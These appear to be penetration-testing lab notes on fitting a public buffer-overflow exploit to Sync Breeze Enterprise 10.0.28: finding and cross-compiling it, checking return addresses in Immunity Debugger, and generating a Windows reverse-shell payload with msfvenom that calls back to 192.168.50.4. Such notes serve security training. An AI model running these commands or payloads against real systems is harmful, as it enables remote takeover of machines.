Finding an exploit for "Sync Breeze Enterprise 10.0.28"
searchsploit "Sync Breeze Enterprise 10.0.28"
searchsploit -m 42341 # copy the exploit into the working directory
# cross-compile the exploit code
i686-w64-mingw32-gcc 42341.c -o syncbreeze_exploit.exe
# the compilation fails; add the missing linker parameter (Winsock library) to fix it
i686-w64-mingw32-gcc 42341.c -o syncbreeze_exploit.exe -lws2_32
Now we find that the DLL module the exploit relies on is not present,
so we need to find another one.
On the Windows client: run Immunity Debugger as administrator.
Click File > Attach and select the syncbrs process.
Once attached, we'll click on the View menu, then Executable modules.
Put a breakpoint at the address used by the exploit, then launch the exploit and check the value of EIP/RIP when the exploit is sent.
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.50.4 LPORT=443 \
EXITFUNC=thread -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d\x25\x26\x2b\x3d"
#compile
sudo wine exploit.exe
If it is off by x bytes, just change the length of the buffer.
--